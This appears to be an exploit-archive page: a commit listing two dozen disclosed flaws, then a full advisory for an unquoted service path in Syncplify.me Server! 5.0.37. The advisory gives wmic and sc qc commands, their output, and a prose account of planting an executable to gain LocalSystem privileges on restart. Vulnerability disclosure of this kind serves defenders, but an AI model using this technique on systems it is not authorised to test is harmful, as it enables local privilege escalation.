e797f5230d
24 changes to exploits/shellcodes HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE' - Unquoted Service Path Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path DiskBoss v11.7.28 - Multiple Services Unquoted Service Path Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated) Joplin 1.2.6 - 'link' Cross Site Scripting
38 lines
No EOL
1.6 KiB
Text
38 lines
No EOL
1.6 KiB
Text
# Exploit Title: Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path
|
|
# Date: 2020-11-08
|
|
# Exploit Author: Julio Aviña
|
|
# Vendor Homepage: https://www.syncplify.me/
|
|
# Software Link: https://download.syncplify.me/SMServer_Setup.exe
|
|
# Version: 5.0.37
|
|
# Tested on: Windows 10 Pro x64 es
|
|
# Vulnerability Type: Unquoted Service Path
|
|
|
|
|
|
# 1. To find the unquoted service path vulnerability
|
|
|
|
C:\>wmic service where 'name like "%SMWebRestServicev5%"' get displayname, pathname, startmode, startname
|
|
|
|
DisplayName PathName StartMode StartName
|
|
Syncplify.me Web/REST Server! v5 C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe Auto LocalSystem
|
|
|
|
# 2. To check service info:
|
|
|
|
C:\>sc qc "SMWebRestServicev5"
|
|
[SC] QueryServiceConfig CORRECTO
|
|
|
|
NOMBRE_SERVICIO: SMWebRestServicev5
|
|
TIPO : 10 WIN32_OWN_PROCESS
|
|
TIPO_INICIO : 2 AUTO_START
|
|
CONTROL_ERROR : 1 NORMAL
|
|
NOMBRE_RUTA_BINARIO: C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe
|
|
GRUPO_ORDEN_CARGA :
|
|
ETIQUETA : 0
|
|
NOMBRE_MOSTRAR : Syncplify.me Web/REST Server! v5
|
|
DEPENDENCIAS :
|
|
NOMBRE_INICIO_SERVICIO: LocalSystem
|
|
|
|
|
|
# 3. Exploit:
|
|
|
|
A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
|
|
When restarting the service or the system, the inserted executable will run with elevated privileges. |